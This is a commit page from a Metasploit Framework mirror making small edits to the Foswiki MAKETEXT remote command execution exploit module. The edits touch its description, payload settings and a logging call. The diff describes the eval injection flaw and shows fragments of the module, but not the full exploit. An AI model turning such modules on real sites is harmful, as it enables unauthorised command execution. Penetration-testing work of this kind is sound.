infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small corrections

unstable
sinn3r 2012-12-21 18:52:40 -06:00
parent 395a20ef22
commit 9af8c9b457
1 changed files with 10 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/unix/webapp/foswiki_maketext.rb
View File

@ -16,18 +16,17 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'Foswiki MAKETEXT Remote Command Execution', 'Name' => 'Foswiki MAKETEXT Remote Command Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability in the MAKETEXT Foswiki variable. Using a This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using
specially crafted MAKETEXT, a malicious user can execute shell commands since user a specially crafted MAKETEXT, a malicious user can execute shell commands since the
input is passed to the Perl "eval" command without first being sanitized. The input is passed to the Perl "eval" command without first being sanitized. The
problem is caused by an underlying security issue in the CPAN:Locale::Maketext problem is caused by an underlying security issue in the CPAN:Locale::Maketext
module. This works in Foswiki sites that have user interface localization enabled module. Only Foswiki sites that have user interface localization enabled
(UserInterfaceInternationalisation variable set). (UserInterfaceInternationalisation variable set) are vulnerable.
If USERNAME and PASSWORD credentials aren't provided anonymous access will be If USERNAME and PASSWORD aren't provided, anonymous access will be tried.
intended. On the other hand, if the FoswikiPage option isn't provided, the module Also, if the FoswikiPage option isn't provided, the module will try to create a
will try to create a random page on the SandBox space. The modules has been tested random page on the SandBox space. The modules has been tested successfully on
successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.
virtual machine.
}, },
'Author' => 'Author' =>
[ [
@ -45,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' => 'Payload' =>
{ {
'DisableNops' => true, 'DisableNops' => true,
'BadChars' => '',
'Space' => 1024, 'Space' => 1024,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet', 'RequiredCmd' => 'generic ruby python bash telnet'
} }
}, },
'Platform' => [ 'unix' ], 'Platform' => [ 'unix' ],
@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/
print_status "#{res.code}\n#{res.body}" vprint_status "#{res.code}\n#{res.body}"
return nil return nil
end end